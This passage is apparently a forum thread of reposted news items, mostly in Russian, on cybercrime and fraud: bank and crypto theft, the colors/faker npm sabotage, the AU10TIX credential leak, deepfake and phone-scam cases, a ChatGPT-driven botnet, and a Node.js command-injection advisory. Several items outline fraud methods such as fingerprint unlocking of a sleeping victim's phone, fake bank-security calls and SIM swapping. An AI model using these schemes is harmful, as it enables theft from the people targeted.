украсть электронные письма, принадлежащие правительствам, должностным лицам и
военнослужащим НАТО.
Ряд крупнейших криптовалютных бирж, работающих с клиентами в Украине, сообщили
о том, что пока у них нет возможности выводить средства на карточки украинских
банков. При необходимости забрать деньги, они советуют воспользоваться
альтернативными методами.
По предварительным данным с проблемой вывода средств на карты украинских
банков столкнулись все криптобиржи.
«Пока фиатные каналы, а именно ввод и вывод через банковскую
карту и другие платежные сервисы временно
приостановлены среди криптовалютных бирж по всей Украине», — говорится в
заявлении
на официальной странице Binance в
фейсбуке.
В настоящее время причина остановки транзакций на карты украинских банков неизвестна. В криптовалютном сообществе обсуждается предположение, что блокирование финансовых переводов криптобирж может быть связано с проверкой деятельности ряда банков, возможно, применявших схемы по уклонению от уплаты налогов участниками игорного рынка.
половина обменников на bestchange перестали работать с гривной - https://www.bestchange.com/tether-trc20-to-visa-mastercard-uah.html, те кто работают ставят ебанутый курс
Это пиздец товарищи
copypast from: https://minfin.com.ua/2023/03/02/101660967/
В Краснодарском крае, Крыму и Московской области задержаны члены преступной группировки, подозреваемые в краже со счетов умерших людей более 60 млн рублей. Об этом сообщила официальный представитель МВД РФ Ирина Волк.
"В результате оперативно-розыскных мероприятий, которые проводились во взаимодействии с представителями служб безопасности банков, на территории Московской области, Краснодарского края и Республики Крым задержаны девять подозреваемых. В их числе предполагаемый организатор", - цитирует Волк "МВД Медиа".
По данным полиции, фигуранты незаконно получали доступ к личным кабинетам мобильных банков умерших и переводили средства на подконтрольные счета, распределяя похищенные средства.
По версии МВД, подозреваемые причастны как минимум к 50 фактам хищений на сумму свыше 60 млн рублей. При обысках изъята база данных с реквизитами банковских счетов умерших граждан, сим-карты, более десятка банковских карт, 20 мобильных телефонов и пять ноутбуков.
Деятельность преступной группы пресекли сотрудники московского угрозыска совместно с полицейскими Северо-Восточного административного округа столицы и коллегами из ФСБ России.
"В отношении семерых участников группы столичные следователи возбудили десять уголовных дел о краже (часть 4 статьи 158 УК РФ), они находятся под стражей. Еще двоим фигурантам инкриминируется незаконное получение и разглашение сведений, составляющих коммерческую, налоговую или банковскую тайну (часть 3 статьи 183 УК РФ). Им избрана мера пресечения в виде подписки о невыезде и надлежащем поведении", – уточнили в МВД.
В настоящее время уголовные дела соединены в одно производство.
В северной столице были задержаны участники организованной преступной группы, занимавшиеся ограблением клиентов питейных заведений.
Участники банды были сотрудниками в петербургских барах «Vice City», «White Point», «Noir», «RS20», «Провокатор», «Nau», «Перестройка», «Искра», «Фартук». Во время работы, они занимались хищением денежных средств получая доступ к картам клиентов, а также наличных средств. Всего было украдено порядка 5 800 000 рублей. В результате обыска были изъяты 22 платёжных терминала, с помощью которых преступники, вероятно и совершали кражи.
У одной из своих жертв члены барной мафии Санкт-Петербурга увели 3,7 млн рублей. При этом деньги были на отдельном счете, не привязанном к карте. ВЧК- ОГПУ стали известны подробности этой истории.
Молодой человек устроил марафон по питерским барам, а силы оставили его в баре White point. После пары рюмок молодой человек вырубился и очнулся только около 8 утра. Вскоре он обнаружил, что с его счетов исчезли 3,7 млн из 4 млн хранившихся там .
С помощью отпечатка пальца спящего клиента сотрудники бара вошли сначала в его телефон, а потом в банковское приложение. Перевели деньги с его депозитного счета на счет, привязанный к карте. А потом в три транша перевели деньги с карты. Только после того, как таким образом было выведено 3,7 млн рублей, банк заблокировал карту, сочтя операции подозрительными.
Стоит отметить, что расследование по заявлению потерпевшего велось очень вяло. А операция последовала, когда бармены опустошили карту одного VIP- клиента со связями.
Бюро общественной безопасности города Чичжоу сообщило, что правоохранительные органы задержали восемь подозреваемых в мошенничестве с криптовалютами.
Полиция провинции Аньхой конфисковала у восьмерых задержанных цифровые активы примерно на 6 млн юаней ($946 000). Власти собираются выдвинуть обвинение в присвоении подозреваемыми 50 млн юаней ($7.9 млн).
Как рассказывают в полиции, сотни инвесторов потеряли деньги из-за мошеннической схемы, позволившей злоумышленникам переводить ликвидность в «анонимный пул» и отмывать без согласия инвесторов:
«После анализа, проведенного оперативной группой, установлено, что этот случай был типичным случаем незаконного получения криптовалюты с использованием блокчейна».
Полиция не уточнила, что за криптовалютный проект они считают мошеннической схемой. Местный новостной сайт о блокчейне Chain Catcher сообщил, что речь идет о проекте Gainswap.
Полицейское расследование было инициировано после того, как в Бюро общественной безопасности Чичжоу полгода назад обратился инвестор, потерявший криптовалюты на 590 000 юаней (около $93 000).
У задержанных в ходе расследования восьмерых человек из провинций Гуандун, Сычуань и Хунань были конфискованы, подчеркивают в полиции, роскошные автомобили и виллы на десятки миллионов юаней.
Марак Сквайрс (Marak Squires), автор популярных пакетов colors (расцветка консоли node.js) и faker (генератор фиктивных данных для полей ввода), насчитывающих 2.8 и 25 млн еженедельных загрузок, разместил в репозитории NPM и на GitHub новые версии своих продуктов, включающие деструктивные изменения, целенаправленно приводящие к сбоям на стадии сборки и выполнения зависимых проектов. В результате действий Марака была нарушена работа многих проектов, включая AWS CDK, использующих указанные библиотеки - библиотека colors используется в качестве зависимости у 18953 проектов, а faker - у 2571.
В код библиотеки "colors" был добавлен вывод в консоль текста "LIBERTY LIBERTY LIBERTY" и бесконечный цикл, блокирующий работу зависимых проектов и выводящий поток из искажённых слов "tesing". В библиотеке faker удалено содержимое репозитория, в коммите "endgame" добавлены файлы .gitignore и .npmignore для исключения файлов проекта, а вместо содержимого файла README размещён вопрос "Что на самом деле случилось с Аароном Шварцем". Проблемы присутствуют в версиях colors 1.4.1+ и faker 6.6.6.
В ответ на совершённые действия GitHub заблокировал доступ Марака к своим репозиториям (90 публичных + несколько приватных), а NPM откатил проблемную версию пакета. При этом законность действий GitHub вызывает вопросы, так как удаление разработчиком кода из одного из своих репозиториев не может рассматриваться как нарушение правил сервиса. Более того, в тексте лицензии на пакеты colors и faker явно обозначено отсутствие любых гарантий и обязательств в отношении работоспособности кода.
Интересно, что первое предупреждение о прекращении разработки было опубликовано больше года назад. В сентябре 2020 года Марак потерял всё имущество из-за [пожара](https://abc7ny.com/suspicious-package-queens-astoria- fire/6425363/), после чего в начале ноября в ультимативной форме призвал коммерческие компании, использующие его проекты, финансировать продолжение разработки, иначе он обещал прекратить сопровождение, так как не намерен больше работать бесплатно. До инцидента последняя версия colors была выпущена два года назад, а faker - 9 месяцев назад.
Что касается мотивов внесения в пакеты деструктивных изменений, то вероятно Марак пытается дать урок корпорациям, пользующимся трудами сообщества разработчиков свободного ПО, но ничего не возвращающим взамен, или привлечь внимание к переосмыслению обстоятельств смерти Аарона Шварца. Аарон покончил жизнь самоубийством после возбуждённого против него уголовного дела, связанного с копированием научных статей из платной базы данных JSTOR, отстаивая идею предоставления свободного доступа к научным публикациям. Аарону были предъявлены обвинения в компьютерном мошенничестве и незаконном получении информации с защищённого компьютера, максимальный срок наказания по которым составлял 50 лет лишения свободы и штраф в миллион долларов (в случае заключения судебного соглашения и признания обвинений Аарону предстояло отсидеть в тюрьме 6 месяцев).
Считается, что Аарон на фоне депрессии не выдержал давления судебной системы и несправедливости выдвигаемых обвинений (ему грозило 50 лет тюрьмы лишь за то, что он скачал содержимое базы данных научных статей, которые по его мнению должны распространяться без ограничения). Марак Сквайрс в опубликованном вместо удалённого кода вопросе о смерти Аарона и в публикации в Twitter-е намекает на неподтверждённую теорию заговора, в соответствии с которой Аарон Шварц нашёл в архиве MIT какие-то документы, порочащие определённых важных лиц, и его за это убили, замаскировав происшествие под самоубийство (завтра исполнится 9 лет как Аарон ушёл из жизни).
-киви
+~~социальный рейтинг~~ цифровой рубль по самым безопасным стандартам фсб
](https://lenta.ru/news/2023/07/26/qiwi/)
«Киви Банк» с 26 июля временно и частично ограничит вывод средств на банковские счета с кошельков физлицами, а также снятие наличных по предписанию Центробанка.
lenta.ru
Издание 404 Media обнаружило, что компания, которая верифицирует личности пользователей для TikTok, Uber и X, порой обрабатывая фотографии их лиц и водительских удостоверений, допустила утечку данных. Более года в сети были доступны административные учетные данные, которые могли получить хакеры.
Израильская компания AU10TIX предлагает «комплексные решения для верификации личности». Это включает в себя проверку документов, удостоверяющих личность, обнаружение «живого присутствия» в видеопотоке в режиме реального времени, а также проверку возраста, когда сервис определяет возраст человека по загруженной фотографии.
На сайте AU10TIX размещены логотипы такие компаний, таких как Fiverr, PayPal, Coinbase, LinkedIn и Upwork, многие из которых подтвердили 404 Media, что являются активными или бывшими клиентами AU10TIX.
Журналисты отмечают, что такие сервисы становятся все более востребованными, так как многие сайты и социальные сети теперь требуют подтверждения личности или возраста, то есть пользователи должны загрузить в систему свои настоящие документы или фото, чтобы получить доступ к определенным сервисам.
Об утечке данных, произошедшей у AU10TIX, изданию сообщил специалист ИБ- компании spiderSilk Моссаб Хуссейн (Mossab Hussein). По его словам, случайно попавший в открытый доступ набор учетных данных предоставлял доступ к платформе, которая, в свою очередь, содержала ссылки на информацию, связанную с конкретными людьми, которые загрузили свои документы для проверки AU10TIX.
Учетные данные, судя по всему, были собраны неким инфостилером еще в декабре 2022 года, и впервые их опубликовали в Telegram-канале в марте 2023 года.
По данным издания, имя, фигурирующие в этих учетных данных, совпадает с именем менеджера по сетевым операциям AU10TIX, которого удалось найти в LinkedIn. Попавший в сеть файл содержал множество паролей и токенов аутентификации для различных сервисов, используемых этим человеком, включая инструменты Salesforce и Okta, а также сам сервис AU10TIX.
С помощью этих учетных данных Хуссейн обнаружил многочисленные имена людей, даты их рождения, данные о гражданстве, идентификационные номера и типы загруженных документов (например, водительских прав). А также ссылки на сами изображения документов, удостоверяющих личность.
Другие скриншоты, предоставленные экспертом, демонстрировали линейную диаграмму с одной осью, обозначенной как clientOrganizationName. На этой оси были перечислены TikTok_Shop_Creator, Impersonation_XCorp и uber-carshare- passport, то есть клиенты AU10TIX.
Хотя ни одна из этих компаний не ответила на многочисленные запросы 404 Media о комментариях, в сентябре прошлого года [X сообщала](https://techcrunch.com/2023/09/15/x-launches-account-verification- based-on-government-id), что сотрудничает с AU10TIX для проверки учетных записей, а в 2020 году сама AU10TIX распространила [пресс- релиз](https://www.prnewswire.com/il/news-releases/uber-and-au10tix-launch- new-safety-measures-for-cash-paying-riders-301174822.html) о своем сотрудничестве с Uber.
Однако найти в сети слитые учетные данные — это одно, а проверить их работоспособность, войдя в систему и просмотрев данные компании, уже совсем другое. Обычно это влечет за собой этические и юридические проблемы. По словам Хуссейна, он пошел на этот шаг, потому что «видел потенциальные последствия от этой утечки и ущерб, который это может нанести людям, если их личные данные будут украдены». В итоге исследователь счел, что должен предупредить компанию, а затем публично рассказать об этом инциденте, «чтобы помочь повысить осведомленность о таких рисках».
Представители 404 Media связались с AU10TIX еще 13 июня 2024 года. Примерно через неделю компания ответила, что «упомянутый инцидент произошел более 18 месяцев назад, и в ходе тщательного расследования было установлено, что тогда учетные данные сотрудника были получены незаконно, после чего они были оперативно аннулированы».
Но, по словам Хуссейна, учетные данные все еще продолжали работать. Когда издание передало эту информацию специалистам AU10TIX, те заявили, что выведут соответствующую систему из эксплуатации. К этому моменту учетные данные компании были свободно доступны в сети около года.
После этого в AU10TIX сделали следующее заявление:
«Хотя данные личные данные были потенциально доступны, на основании результатов нашего расследования, мы не обнаружили никаких доказательств того, что эти данные были скомпрометированы. Безопасность наших клиентов имеет первостепенное значение, поэтому мы уведомили их [об инциденте]».
Click to expand...
В компании добавили, что «продолжат процесс вывода из эксплуатации соответствующей системы, заменив ее на новую».
Британская инженерная компания Arup подтвердила, что стала жертвой мошенничества с использованием дипфейка, когда один из сотрудников перевел преступникам 200 миллионов гонконгских долларов (20 миллионов фунтов стерлингов) через видеозвонок, сгенерированный искусственным интеллектом.
Полиция Гонконга заявила в феврале , что сотрудник неназванной компании был обманут и перевел крупные суммы денег злоумышленникам, которые выдали себя за руководителей компании.
В своем заявлении Arup подтвердила, что именно она стала жертвой мошенничества, и в начале года уведомила полицию о случившемся инциденте в Гонконге. В компании подтвердили использование поддельных голосов и изображений.
Также в заявлении указано, что финансовая стабильность и бизнес-операции компании не пострадали, и внутренние системы не были скомпрометированы.
Роб Грейг, главный информационный директор Arup, отметил, что компания регулярно подвергается атакам, включая дипфейки.
«Как и многие другие компании по всему миру, наши операции подвергаются регулярным атакам, включая мошенничество с счетами, фишинговые атаки, подмену голосов в WhatsApp и дипфейки. За последние месяцы количество и сложность этих атак значительно возросли», — сказал Грейг.
Грейг выразил надежду, что опыт Arup поможет повысить осведомленность о растущей сложности кибератак. Первым о том, что целью мошенников стала Arup, сообщил Financial Times.
Arup — одна из ведущих консалтинговых инженерных фирм мира, в которой работают более 18 000 человек. Компания известна проектированием конструкций Сиднейского оперного театра с его характерными бетонными оболочками. Среди недавних проектов — транспортная схема Crossrail в Лондоне и Храм Святого Семейства в Барселоне.
На прошлой неделе мы сообщали , что глава крупнейшей в мире рекламной группы также стал жертвой мошенничества с использованием дипфейка. Генеральный директор WPP, Марк Рид, рассказал о мошенничестве в письме коллегам и предупредил их быть внимательными к звонкам, выдающим себя за звонки от руководства компании.
По сообщениям гонконгских СМИ, старший полицейский суперинтендант Барон Чан сообщил, выдававших себя за руководителей компании, что сотрудника пригласили на видеоконференцию с множеством участников. Участники выглядели как настоящие люди, и сотрудник перевел 200 миллионов гонконгских долларов на пять местных банковских счетов через 15 транзакций.
Следственным отделом ОМВД России по Лабинскому району завершено расследование уголовного дела, возбужденного в отношении двоих жителей Самары в возрасте 20 лет по признакам преступления, предусмотренного частью 3 статьи 159 УК РФ «Мошенничество».
По данным следствия, обвиняемые, вступив в преступный сговор с неустановленными лицами в сети Интернет, за денежное вознаграждение оформили банковские карты на социально неблагополучных граждан и передали данные счетов сообщникам. После этого аферисты позвонили 81-летней жительнице Лабинского района, представились сотрудниками службы безопасности банка и сообщили о том, что ее сбережения пытаются похитить мошенники. Затем звонившие убедили пенсионерку перевести более 920 тысяч рублей на «безопасный» счет, предоставив данные карт, оформленных обвиняемыми. Получив деньги, обвиняемые обналичили их и передали сообщникам, оставив себе за работу 5% от похищенной суммы.
На период предварительного следствия молодым людям избиралась мера пресечения в виде заключения под стражу.
В настоящее время материалы уголовного дела с утвержденным обвинительным заключением направлены в суд для рассмотрения по существу. Санкции инкриминируемой части статьи предусматривают максимальное наказание в виде лишения свободы на срок до шести лет.
Исследователи из Университета Индианы обнаружили ботнет на платформе X, ранее известной как Twitter. Ботнет под названием Fox8 управлялся с помощью технологии ChatGPT и включал в себя 1 140 аккаунтов. Эти фейковые аккаунты, управляемые ИИ, создавали посты и взаимодействовали друг с другом, привлекая внимание пользователей к криптовалютным сайтам. Это может рассматриваться как форма мошенничества и дезинформации.
Исследователи считают, что Fox8 — лишь вершина айсберга и существуют другие, более сложные кампании, которые пока не были обнаружены. Для обнаружения ботнета использовалась фраза «Как языковая модель ИИ...», которой ChatGPT иногда отвечает на запросы. Филиппо Менцер, один из ученых, подчеркнул, что обнаружение ботнета стало возможным благодаря его ненадежной маскировке.
Менцер также отметил, что такие программы обманывают как платформу, так и пользователей. Социальные алгоритмы, замечая активность, показывают посты большему числу людей, что делает продвижение криптовалютных платформ быстрым.
Источник: www.securitylab.ru
(https://www.securitylab.ru/news/541135.php)
Сотрудники Управления по организации борьбы с противоправным использованием информационно-коммуникационных технологий ГУ МВД России по Санкт-Петербургу и Ленинградской области задержали жителя Северной столицы. Он подозревается в неправомерном доступе к компьютерной информации.
«Предварительно установлено, что злоумышленник создал в сети Интернет несколько фишинговых сайтов. Их внешний вид копировал официальные страницы различных государственных учреждений. При попытках воспользоваться сервисами граждане вводили данные своих учетных записей, зарегистрированных на Едином портале государственных и муниципальных услуг. Таким образом фигурант получал доступ к чужим аккаунтам и, меняя пароли, использовал их для подачи заявок в микрокредитные организации. Перечисленные деньги выводил через анонимные электронные кошельки и обналичивал. После того как лимит на получение кредита исчерпывался, учетная запись уничтожалась вместе со всей информацией о ее использовании.
Следователем СУ УМВД России по Красносельскому району города Санкт-Петербурга возбуждено уголовное дело по признакам преступления, предусмотренного статьей 272 УК РФ. Подозреваемый задержан полицейскими на территории города Уфы. В ходе обыска по месту его временного проживания изъяты 25 SIM-карт, средства связи, банковские карты. По имеющейся информации, потерпевшими от действий хакера стали более 130 граждан.
В настоящее время фигурант доставлен в Санкт-Петербург, в отношении него избрана мера пресечения в виде запрета определенных действий. Проводятся оперативно-розыскные мероприятия, направленные на установление всех эпизодов противоправной деятельности», - сообщила официальный представитель МВД России Ирина Волк.
video:
Платформа потребовала вернуть часть средств в обмен на свободу.
DeFi-платформа Euler Finance объявит премию в размере $1 млн. за информацию, которая поможет найти хакера, взломавшего протокол Euler Finance и укравшего $197 млн.
Кибератака произошла 13 марта . По первоначальным данным компании, из проекта было выведено криптоактивов на $177,6 млн, в том числе DAI на $8,7 млн, WBTC на $18,5 млн, stETH на $116 млн и USDC на $33,6 млн. Позже было обнаружено, что сумма украденных активов выросла до $197 млн.
Вечером 13 марта команда Euler Finance направила первое ончейн-сообщение на адрес хакера, в котором предлагала начать переговоры:
«Мы понимаем, что вы несете ответственность за атаку на платформу Euler. Мы пишем, чтобы узнать, готовы ли вы обсудить с нами возможные следующие шаги», — говорилось в обращении.
Click to expand...
Не получив ответа, вечером 14 марта команда Euler Finance пригрозила взломщику, что если он не вернет 90% украденных средств (около $176,4 млн.) в течение 24 часов, то они объявят награду в размере $1 млн. за информацию, которая приведет к его аресту и возврату похищенных активов.
Euler Finance - DeFi-платформа на блокчейне Ethereum , предоставляющая услуги криптовалютного кредитования. В прошлом году проект привлек $32 млн в раунде финансирования с участием FTX, Coinbase, Jump Crypto, Jane Street и Uniswap.
После взлома курс токена Euler (EUL) упал на 46%, а его рыночная капитализация сократилась с $98 млн до $52 млн. Кража активов из протокола Euler Finance стала самой крупной в этом году.
Государственный департамент США объявил о вознаграждении в десять миллионов долларов, которые могут достаться тому, кто предоставит информацию хотя бы об одном из пяти ключевых участников кибергруппировки, распространявшей программу-вымогатель Conti.
Всё это в рамках программы «Награды справедливости», которую Госдеп организовал с целью выявления членов киберпреступных групп, угрожающих национальной безопасности США.
Одновременно с объявлением о вознаграждении Госдеп впервые раскрыл лицо одного из операторов Conti, действующего под псевдонимом “Target“. Другие четверо киберпреступников проходят под кличками “Tramp“, “Dandis“, “Professor“ и “Reshaev“.
Виталий Кремец, глава AdvIntel, немного подробнее рассказал изданию BleepingComputer о тех ролях, которые играют разыскиваемые члены группировки:
Tramp — главный в операциях шифровальщика BlackBasta и один из главных в группе Conti. Помимо этого, он выполняет роль владельца и администратора инфраструктуры командного центра знаменитого Qbot.
Dandis — технарь, отвечающий за пентест и управление операциями вымогателя.
Professor — один из лидеров банды, распространявшей Ryuk, отвечает за тактику атак Conti.
Reshaev — ключевой разработчик в операциях Ryuk / Conti, создавший веб- билдер для пейлоада. Также обеспечивает поддержку фронтенда и бэкенда для кампаний шифровальщика.
Target — некий офис-менеджер с опытом юриста.
Target предоставил список из 428 больниц и завил, что «скоро начнется паника»
Click to expand...
Презренный, у них нет гуманност. Trickbot зашел слишком далеко.
__
](https://www.securitylab.ru/news/529411.php)
Внутренняя переписка между руководителями группировки проливает свет на ее структуру и деятельность.
 www.securitylab.ru
Россиян предупредили об опасности смарт-часов
ESET: киберпреступники могут использовать смарт-часы для кражи персональных данных
Киберпреступники могут использовать смарт-часы для кражи персональных данных. Об этом «Ленте.ру» сообщили аналитики компании ESET, которые предупредили россиян об основных опасностях, связанных с этим гаджетом.
«По нашим оценкам, рынок смарт-часов и фитнес трекеров ежегодно будет увеличиваться на 12,5 процента и к 2028 году превысит 118 миллиардов долларов. Такие показатели не могут не привлекать мошенников. Поэтому стоит заранее понимать связанные с этим риски безопасности и конфиденциальности данных», — говорится в исследовании ESET.
Угроза перехвата данных связана с тем, что многие смарт-часы и фитнес-трекеры синхронизируются со смартфонами владельцев, в том числе с некоторыми приложениями — электронной почтой или мессенджерами. Таким образом злоумышленники могут захватить оба устройства, что угрожает, в частности, потерей паролей. В ESET предупреждают, что затем украденные персональные данные могут быть проданы в даркнете.
Другой серьезный риск для жертвы киберпреступника — отслеживание геопозиции устройства. Такие данные позволяют хакерам составить детальную схему перемещений пользователя, чтобы уже физически атаковать его самого, жилище или машину. «Еще большее беспокойство вызывает безопасность детских смарт-часов, которые могут отслеживаться посторонними», — констатируют в ESET.
Говоря о конкретных уязвимостях умных фитнес-трекеров, киберспециалисты обращают внимание на технологию Bluetooth, в которой «за прошедшие годы были обнаружены многочисленные уязвимости», слабое программное обеспечение гаджетов и сопряженных приложений смартфонов, которые могут содержать ошибки кодирования. По мнению аналитиков ESET, снизить риски можно благодаря использованию двухфакторной аутентификации, применению надежного пароля для блокировки экрана, а также запрету на внешние подключения к смарт-часам.
Ранее россиянам рассказали о способах защиты своих персональных данных. Аналитики «Лаборатории Касперского» выяснили, что почти каждый третий житель страны хоть раз в жизни выкладывал в социальных сетях личную информацию о себе, в том числе номер телефона, домашний адрес или место работы.
Северная Корея недавно предприняла попытку хакерской атаки с целью кражи индийской военной информации оружия и оборонной промышленности из Индии, сообщило Радио Свободная Азия(RFA) 21-ого декабря 21.
В отчете под названием «Информация о киберугрозах» недавно опубликованном Индийским разведывательным управлением, Китай и Пакистан, включая Северную Корею, попытались получить доступ к компьютерам, связанным с ядерными и оборонными материалами Индии.
Сообщается, что хакеры пытались взломать компьютеры, связанные с крупными национальными учреждениями, например, распространив вредоносные коды через 56 приложений на 13 компьютеров государственных учреждений в Индии в период с 1 по 31 октября 2021-ого года.
Целевыми организациями для взлома являются полиция, банки, военные организации, гражданская авиация и правительственные ведомства.
В отчете также добавлено, что в сентябре китайские хакеры активно пытались взломать 40 компьютеров связанных агентств, чтобы получить отчет о состоянии обороны Индии.
Число северокорейских хакеров, пытающихся взломать правительственные учреждения Индии, за последние годы значительно увеличилось. В октябре 2019 года северокорейская хакерская группировка Lazarus атаковала сеть Индийской корпорации по атомной энергии(NPCIL), остановив работу атомной электростанции. Индийский эксперт по безопасности заявил, что примерно в то же время Северная Корея пыталась взломать как минимум пять правительственных учреждений Индии, в том числе Институт космических исследований. Также известно, что Северная Корея пыталась взломать Россию.
Ежедневная газета «Комерсантъ» уже сообщала 23 ноября прошлого месяца, что группа хакеров при Главном бюро разведки Северной Кореи взламывала экспертов Корейского полуострова, пытаясь украсть российскую информацию о Корейском полуострове.
Как показывают данные Единого реестра судебных решений, одной из самых популярных схем мошенничества, со стороны интернет-покупателей, является кража товаров, купленных наложенным платежом. Мошенники приходят за посылкой, осматривают ее, а затем подменяют на какое-нибудь барахло и отказываются от получения.
Следуя этому сценарию, безработный уроженец Одесской области, решил заказать через интернет что-нибудь ценное, что можно будет украсть и выгодно продать. Изучив предложения в интернете, он остановил свой выбор на ассортименте известного интернет-магазина украшений «Золотой Век». Цепочка из золота 585-й пробы, стоимостью 12,7 тысяч гривен, обещала стать достойным уловом мошенника.
Готовясь к операции, мужчина заготовил дешевую бижутерию из желтого металла, которой он рассчитывал подменить свой интернет-заказ. Когда посылка прибыла в выбранное отделение Новой Почты, злоумышленник попросил осмотреть ее перед оплатой и попытался найти укромное место вне поля зрения сотрудников отделения.
Но что-то пошло не так. Мужчине никак не удавалось избежать пристального внимания сотрудников, чтобы подменить золотую цепочку на подделку, но и уходить с пустыми руками тоже не хотелось.
Разнервничавшись, он, наконец, улучил момент, сунул в пакет дешевую подделку и отдал ее оператору. Однако сотрудники уже обратили внимание на подозрительного клиента, кроме того, факт подмены содержимого был зафиксирован камерами слежения.
Приняв обратно пакет, сотрудники Новой Почты обнаружили подлог и вызвали полицию. Задержанный признался в своем преступном замысле, который не удалось довести до конца только по причине независящих от него обстоятельств.
Не смотря на то, что, фактически, преступление не состоялось и реальный ущерб не понесли ни продавец, ни перевозчик, который в подобных случаях обязан возместить полную стоимость пропавшей посылки, незадачливый мошенник понес достаточно серьезное наказание.
За попытку кражи золотой цепочки, стоимостью 12,7 тысяч гривен, обвиняемый был осужден на уплату штрафа, почти втрое превышающего стоимость так и не украденного украшения. Решением суда, незадачливый мошенник должен заплатить в пользу государства штраф 34 тысячи гривен, а также расходы на экспертизу (858 грн).
Сотрудники Национальной полиции Украины в Житомирской области разоблачили пятерых человек, в том числе главный бухгалтер филиала банка и предприниматель, которые наладили схему присвоения средств клиентов банка в особо крупных размерах.
Об этом в четверг, 5 августа, сообщает пресс-служба Министерства внутренних дел Украины.
Согласно информации, злоумышленники проворачивали свои махинации, используя несанкционированный доступ к банковским системам, что позволяло им списывать деньги с банковских счетов.
За раз преступники "выводили" от 40 до 500 тысяч гривен. Получали же их по поддельным документам в банковских кассах.
Правоохранители установили, что за все время своей деятельности злоумышленники выкрали со счетов людей более 14 миллионов гривен.
Всем участникам ОПГ выдвинуто обвинение по нескольким статьям Уголовного кодекса Украины, в том числе ч 4 и 5 ст 185 "Кража в особо крупных размерах или организованной группой", а также ч 2 ст 200 "Незаконные действия с документами на перевод, платежными картами и другими способами доступа к банковским счетам, электронным деньгам, оборудованию для их изготовления".
Расследование завершено и дело передано в суд. В случае, если вина злоумышленников будет доказана, им грозит срок от 7 до 12 лет тюремного заключения с конфискацией имущества.
В век цифровых технологий преступники используют различные способы что бы завладеть чужими деньгами, не только взламывая банковские системы, но и напрямую узнавая от вас реквизиты банковских карт. Одним из таких способов был поддельный сайт BankID, который запрашивал у посетителей данные об их платежных картах, с которых позже списывались деньги.
• Source: mvs.gov.ua/uk/press-center/news/vikradennya-ta-vidmivannya-14-mln- grn-kostiv-iz-bankivskix-raxunkiv-gromadyan-ucasniki-zlocinnogo-ugrupovannya- postanut-pered-sudom
A heavily downloaded Node.js library has a high severity command injection vulnerability revealed this month.
Tracked as CVE-2021-21315 , the bug impacts the "systeminformation" npm component which gets about 800,000 weekly downloads and has scored close to 34 million downloads to date since its inception.
Put simply, "systeminformation" is a lightweight Node.js library that
developers can include in their project to retrieve system information related
to CPU, hardware, battery, network, services, and system processes.
According to the project's developer, developers are expected to use
"systeminformation" in the backend.
"Node.js comes with some basic OS information, but I always wanted a little more. So I came up to write this little library."
"This library is still work in progress. It is supposed to be used as a backend/server-side library (will definitely not work within a browser)," states the developer behind the component.
However, the presence of the code injection flaw within "systeminformation"
meant an attacker could execute system commands by carefully injecting payload
within the unsanitized parameters used by the component.
The fix shown below that went into version 5.3.1 of "systeminformation"
sanitizes the parameters, checks if they are of the string data type and
additionally whether prototype pollution had occurred at any point by the
parameter, prior to invoking further commands.

Fix for CVE-2021-21315 sanitizes and validates the parameters properly
Source: GitHub
Users of "systeminformation" should upgrade to versions 5.3.1 and above to
resolve the CVE-2021-21315 vulnerability in their application.
For developers who are unable to upgrade to the fixed version, the project publisher has shared information on a workaround that can be adopted instead.
This again involves cleaning up the parameters for any offending characters
and properly validating if they are of the string data type.
"As a workaround instead of upgrading, be sure to check or sanitize service
parameters that are passed to si.inetLatency() , si.inetChecksite() ,
si.services() , si.processLoad() ... do only allow strings, reject any
arrays. String sanitation works as expected," reads the associated npm
security advisory.
Node.js developers are encouraged to ensure if their applications properly sanitize user input prior to using it within commands and database queries.
Users should also periodically visit npm security advisories for information on the latest security fixes made to Node.js components.
Согласно последнему отчету Microsoft, хакеры SolarWinds загрузили исходный код трех ее продуктов, а именно: облачного сервиса Azure, облачного решения для управления Intune и сервера Exchange. По словам Microsoft, во всех трех случаях хакерам удалось получить доступ только к небольшому количеству файлов, хотя их поисковые запросы указывают на то, что злоумышленников интересовали конфиденциальные данные компании.
__
](https://msrc-blog.microsoft.com/2021/02/18/microsoft-internal-solorigate- investigation-final-update/)
msrc-blog.microsoft.com
Microsoft's analysis of SolarWinds 'computer hacking suggests that the malicious code used in the attack on SolarWinds' supply chain was developed by about 1,000 developers. Microsoft President Brad Smith called the incident "the largest and most sophisticated attack the world has ever seen."It is probably fair to say that this is the largest and most complex attack ever to take place in the world. This is the first use of supply chain disruption tactics against the USA
Microsoft president ](https://www.reuters.com/article/us-cyber-solarwinds- microsoft-idUSKBN2AF03R)
A hacking campaign that used a U.S. tech company as a springboard to compromise a raft of U.S. government agencies is "the largest and most sophisticated attack the world has ever seen," Microsoft Corp President Brad Smith said.
www.reuters.com
Помощников телефонных мошенников отправили за решётку в Караганде, сообщает пресс-служба Казыбекбийского районного суда.
Согласно материалам суда, четверых человек обвиняли в совершении 11 эпизодов мошенничества в крупном и особо крупном размерах. Они были так называемыми дропперами – помогали телефонным мошенникам, находящимся за пределами Казахстана. Одного из осуждённых задержали у банкомата, когда он снимал деньги потерпевшего.
Фигуранты скупали у малообеспеченных граждан банковские карты, на которые переводили похищенные деньги. Затем они снимали наличные в банкоматах и делились с соучастниками. В суде были и те люди, которые продали свои карты. Они участвовали как свидетели.
Один из осуждённых получил шесть лет лишения свободы, второй – пять лет, ещё двое – по четыре года заключения с учётом наличия малолетних детей.
Федеральный судья приказал молодому хакеру, который предположительно украл криптовалюту у крипто-инвесторов Северной Калифорнии, уплатить правительству США почти 5,2 миллиона долларов в биткоинах и вернуть спортивный автомобиль.
Подросток Ахмад Вагаафе Харед из Тусон, штат Аризона, в 2016 году, когда ему было 18 лет, начал сотрудничать с двумя соучастниками для кражи криптовалюты. Преступники сначала получили личную контактную информацию руководителей криптовалютных проектов и инвесторов криптовалюты. Затем они якобы связались с поставщиками услуг мобильной связи и убедили представителей компании, что являются законными владельцами номеров телефонов жертв. Такой процесс известен как SIM-своппинг (SIM Swapping).
Получив контроль над номерами телефонов жертв, Харед и его соучастники смогли взломать электронную почту и другие аккаунты. В конечном итоге злоумышленники использовали свой доступ к аккаунтам, чтобы проникнуть в криптовалютные депозиты своих жертв.
Федеральный судья в Сан-Франциско вынес предварительный приказ о конфискации у Хареда 119,8 биткоина (BTC) стоимостью 5,2 миллиона долларов, а также 93 420 Stellar Coins (XLM) и BMW i8 2017 года выпуска. Харед признал свою вину в 2019 году, но многие документы по делу остаются незакрытыми.
